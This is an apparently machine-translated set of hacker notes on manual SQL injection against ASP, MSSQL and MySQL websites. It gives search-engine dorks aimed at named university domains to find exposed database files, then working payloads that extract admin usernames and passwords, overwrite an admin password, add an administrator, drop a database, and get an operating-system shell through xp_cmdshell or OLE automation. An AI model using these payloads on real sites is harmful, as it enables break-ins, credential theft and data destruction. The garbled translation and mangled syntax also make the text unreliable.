Various types of database injection notes

Almost all of the backend databases for ASP sites are access and SQL Server
The most common applications for JSP environments are the use of JDK and Tomcat to build
Site:xx.com inurl:php?id=

Pop-up is generally a combination of%5C or Inc and other symbols that cause the system to call the database with an error when it calls the database and then return the data to indicate an error
Errors typically contain the absolute path to the database 92

Conn.asp is often a file that contains database connection information in an ASP program

Inurl:/inc+conn.asp
Go to Parent Directory
http://www.jegsworks.com/lessons/resources/databases%20resources/
Intext:to Parent Directory+intext:mdb site:fudan.edu.cn Search site database file
Intext:to Parent Directory+intext:conn.asp site:ujn.edu.cn

http://johnny.ihackstuff.com/View Latest Statements
The data exchanged by the controlled server or the remote host is passed through port 80.

%5c the last of the site \ change to%5c IIS
%23 instead of # download database

Almost PHP is combined with MySQL

ASP Manual Injection

And user>0 can determine the background database type
Manual injection of Microsoft JET from the ACCESS database
and exists (select *from table name) OR and exists (select count from table name) guess the table name
and exists (select Column name from table name) OR and exists (select COUNT (column name) from table name) guess the name of the column
and (select top 1 len (column name) from table name) >x X is the number we need to exchange this x is the length value of the column to guess the length of the solution column
To guess the user name and password, use the ASC and mid functions to intercept the nth character with the Mid (column name, n,1) function and then use the ASC (Mid column name, n,1) function to get the nth character ASCLL code
and (select top 1 ASC (Mid (adminname,1,1)) from admin) >96

MSSQL +asp
And user>0 determine the database name

The method of exploding any table name and column name n represents the first table
Asp?id= and (select top 1 name from (select Top N,id,name,from,sysobjects,where,xtype=char ($) T order BY in Desc) >1

Burst the data in the database Asp?id=xx and (select top 1 username from admin where id=1) >1 can guess the first piece of data username in the admin table.
Password

The parameter in the URL is the character asp?id=value ' and 1=1 to determine if there is an injection vulnerability
In SQL injection, if the admin password is MD5 encrypted and we can't hack it, we can directly use SQL injection to modify the data in the database.
Get rid of the administrator password directly the related statement Update table name set column name = ' content ' Where condition
e.g. asp?id=xx; Update admin set PASSW ord= ' 123 ' where username= ' zyh '
Add Administrator-related statements insert into table name values (content)--
For example Asp?id=xx;insert into admin values (account number, password)
Deleting a database drop databases name
View database version and (SELECT @ @version) >0
and Db_name () >0 the current database name
and user>0 to get the current database user name
sysobjects is SQL Server's

1 MSSQL extended Stored procedure
MSSQL also has many extensions that take advantage of the database's extended stored procedures (Exec,master,xp_cmdshell) to get the shell
Asp?id=1;exec Master. xp_cmdshell ' dir C + ' After execution, we can see the files and folders in the C packing directory.
Before you use it, judge if he exists.
and select COUNT (*) from master.dbo.sysobjects where xtype= ' X ' and name= ' xp_cmdshell ' are normally present
if not present use; Exec sp_addextendedproc xp_cmdshell, ' xplog70.dll ' to restore the extended stored procedure of the database
If you want to remove the process; Exec sp_dropextendedproc ' xp_cmdshell '

2 Some functions are provided in MSSQL2000 to access an OLE object through which he can access OLE space indirectly, we get a shell.
DECLARE @S INT
EXEC sp_oacreat ' Wscript.Shell ', @s
EXEC master. Spoamethod @s, ' run ', null, ' cmd.exe/c cmd command ' the above two methods must be SA permissions to be able to execute

MySQL database in the current database system only support/* Comment
Id=xx/*test If you return to the normal description is MySQL

A new Federated Query Union feature was added above MySQL version 4, such as SQL statement 1 Union SQL statement 2 commits after 1 2 statements are executed
Determine the MySQL version
and Ord (Mid (Version (), plus)) >51 Normal is 4.0 above 51 is ASC code 3

To determine the number of fields in the current database
1 UNION limit requires two statements to have the same number of fields
2 Order by Number return field number//field refers to the column of the data table, the record refers to the row of the data table
and 1=2 Union statement can burst the position of these numbers
After you know the number of fields, we can use the union query to get the table name of the current database Union select field number from table name
and 1=2 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin returns normal Description admin This table name exists
The information shown is given in a few numbers 2,3,4,5,6,7,8,9 these numbers for example we want to view the database version by using version ()
Just replace version () with any number
and 1=2 Union select 1,version,3,4,5,6,7,8,9,10,11,12,13 from Admin will appear in 2 where the version appears
Union select 1,username,3,4,5,6,7,8,9,10,11,12,13 from admin
Union select 1,password,3,4,5,6,7,8,9,10,11,12,13 from admin default first person
You can use Load_file (hex of path) with root permission as above

Union select 1,password,3,4,5,6,7,8,9,10,11,12,13 from admin where id=2 specify a password for the second person

Determine if root permission and Ord (User (), 1, 1) =114
Determine if you have file read and Write permissions and (select COUNT (*) from Mysql.user) >0

Various types of database injection notes